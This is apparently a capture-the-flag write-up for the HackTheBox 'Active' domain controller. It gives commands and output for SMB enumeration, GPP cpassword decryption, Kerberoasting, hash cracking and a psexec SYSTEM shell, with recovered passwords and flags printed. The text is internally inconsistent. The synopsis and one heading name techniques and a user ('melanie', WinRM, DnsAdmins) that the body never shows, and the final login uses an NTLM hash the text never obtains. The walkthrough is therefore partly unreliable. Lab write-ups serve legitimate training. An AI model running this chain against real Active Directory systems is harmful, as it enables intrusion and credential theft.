HackTheBox Active
Writeup for HackTheBox Active
HackTheBox Active
Machine Synopsis
Active is an easy to medium difficulty machine, which features two very prevalent techniques to gain privileges within an Active Directory environment. (Source)
Key exploitation techniques:
- Anonymous SMB access for GPP file disclosure
- GPP
cpassworddecryption - Password spray for valid credentials
- WinRM for initial user access
- PowerShell transcript log analysis for credential discovery
- Lateral movement
DnsAdminsgroup abuse for arbitrary DLL loading and RCE
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
❯ nmap -sC -sV -A 10.10.10.100
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-16 07:18:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
The scan identified a Windows Domain Controller (ACTIVE) running Active Directory services. enum4linux was used for initial SMB enumeration.
1
2
3
4
5
6
7
8
❯ enum4linux -a -M -l -d 10.10.10.100 2>&1
...
Sharename Type Comment
--------- ---- -------
Replication Disk
...
//10.10.10.100/Replication Mapping: OK Listing: OK Writing: N/A
...
The Replication share was accessible anonymously. smbclient was used to browse its contents.
1
2
3
4
5
6
7
8
❯ smbclient //10.10.10.100/Replication -N
Anonymous login successful
smb: \> ls
active.htb D 0 Sat Jul 21 18:37:44 2018
smb: \> cd active.htb\
smb: \active.htb\> ls
Policies D 0 Sat Jul 21 18:37:44 2018
scripts D 0 Thu Jul 19 02:48:57 2018
Further enumeration within active.htb\Policies\ led to {31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml. This file was downloaded.
1
2
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (6.8 KiloBytes/sec) (average 6.8 KiloBytes/sec)
Groups.xml contained a cpassword attribute.
1
2
3
4
❯ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Exploitation
GPP cpassword Decryption & Password Spray (melanie)
The cpassword value edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ was extracted. A public gpp-decrypt.py tool was used to decrypt it.
1
2
3
4
❯ python3 gpp-decrypt.py -f Groups.xml
...
[ * ] Username: active.htb\SVC_TGS
[ * ] Password: GPPstillStandingStrong2k18
enum4linux was used with these credentials to confirm accessible shares.
1
2
3
4
❯ enum4linux -a -u "active.htb\SVC_TGS" -p "GPPstillStandingStrong2k18" 10.10.10.100
...
//10.10.10.100/Users Mapping: OK Listing: OK Writing: N/A
...
smbclient was used to browse the Users share with SVC_TGS credentials.
1
2
3
4
5
6
7
8
9
❯ smbclient //10.10.10.100/Users -U SVC_TGS
Password for [WORKGROUP\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 22:39:20 2018
.. DR 0 Sat Jul 21 22:39:20 2018
Administrator D 0 Mon Jul 16 18:14:21 2018
SVC_TGS D 0 Sat Jul 21 23:16:32 2018
...
Privilege Escalation
Kerberoasting & Pass-the-Hash (SYSTEM)
With the credentials for SVC_TGS, impacket-GetUserSPNs was used to request TGS service tickets for Service Principal Names (SPNs) from the Domain Controller.
1
2
3
4
5
6
7
8
9
❯ impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 03:06:40.351723 2024-12-16 15:13:47.549751
[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
An initial attempt failed due to a Kerberos clock skew error. The system time was synchronized with the Domain Controller.
1
2
3
❯ timedatectl set-ntp off # Disable NTP sync to manually set time
❯ sudo rdate -n 10.10.10.100 # Sync time with DC
Mon Dec 16 16:54:02 +08 2024
After time synchronization, impacket-GetUserSPNs was run again, successfully retrieving the TGS hash for the Administrator SPN (active/CIFS:445).
1
2
3
4
5
6
7
8
9
10
❯ impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 03:06:40.351723 2024-12-16 15:13:47.549751
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b6c353ff43e19064e0c2bd64fa03c0bd$70b3f204f2dc96b72f2ee217fbb7eb27b3ca063e72dc805e5e5f64a5881a3bad622b4f70dbe37a56d0780d501c37cb33cc69489428b41901806609e91ecc5a37bed151118a4695f4e54684a78a5d761ec8bfa73b1816bcf4e960e668e08b7950f262524442d5a66422244adff8b784d0ec1238f21fa1a301129ad66420e96055f300b081cdb258868260c0d7e9301cf8a0d6b198135b01dedfa3b80cfb502d99f8ea6e08266eb97989cdfa3377c2b1d47789de4e1e91b453d70de56d8baf8e1d91199cf0102cbc6d28623642de203db979ec32cbe60d61e1b0c8aedf5135b4ef58d841b27ae11d284ad02bbef4247bdf42ba0b6447978b7df53328fc1752b0659de864645ca161f0d0c9168d3b9e2d522209a6dcee139cdf1b2270bbe0acfdf49fa90f6220565733a746e734ca7dfb417807258795bbbebcb5c0767dd6b3d265c6c247e956729603b83c42cbbb3a8c7d2fec531e17b01e29fb7a251fd7ad5bff4655a0dbbcf5a3857ab6efe3994d7ee9295ac78ff1b0a2ed71221fa6303e43b385cc18af774c55bc2a1d8e984f46282de7970ae24673b8b3eef342e463f86337f0ebc68ecd786e847ca6373f7d93f15c2e13a82422f56fdf0ae727d8428e1a4f29bc6e0b43cb41ace8f58234d4ac3f8a1f36cfa58da6bca55932c294fd4566e6e7fd49c00cdf447991ecab6cc93b519289d2f956f818c163c8f538a208294ef6b94f66bd4f903b83e37fab36324ff6cb31b1f6645b2cbd081798b7f94c1007fb6afed5e36119f733be84daa5effb032ec6a75243cf6aa03f17f46428030e653edb06c5e58ae03912fe1b8f619bfbe7bb476bef2896d3601df2ddb208e3fb684f3189f8337590c4530f06897cbec90f65bd84720991a4e3fcc7cf9501cf47406479380d01ba1f560cb29f133dad597692c1956e37fd96adbb8f68e051eec3ae90f53e17e171e83604924f9f8fc1237b06d0bed881b89c7c251343087eb4a5c7df602641ba4ffda5866cb9f35248be6c8f78bd48b9ba07f738ceb1ef1a64170dc5ef1de29b9766991474eabb79c98d87463f766094b1939dacb35c9a0057a9369cf011fd71cdc743d5d05e678a4372c1084a84a6e0e313f3e7b12984bfd19de5ebdad6aa7b724cadcc1141cdaffa45634dc269ac8285063402161879ee785e38d83e4391e62e5cbedf1dfb2341b11312cd3d0dea8500617d638fb1363467563b0f718a5a8015dc22c921edf592a9241c251726ab254bcf5a508833
The captured TGS hash was saved to hash.txt and cracked using john with rockyou.txt.
1
2
❯ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Ticketmaster1968 (?)
The password for Administrator was Ticketmaster1968.
Final login as Administrator via psexec.py confirmed full system compromise.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
❯ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 Administrator@10.10.10.100
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file nRDUlYHs.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service pbva on 10.10.10.100.....
[*] Starting service pbva.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
The user.txt and root.txt flags were retrieved.
1
2
3
4
5
C:\Windows\system32> type C:\Users\SVC_TGS\Desktop\user.txt
60d70428ba69e195149a18bac41361ae
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
fb852b3c834cb62df5dc093dc705336d
This post is licensed under CC BY 4.0 by the author.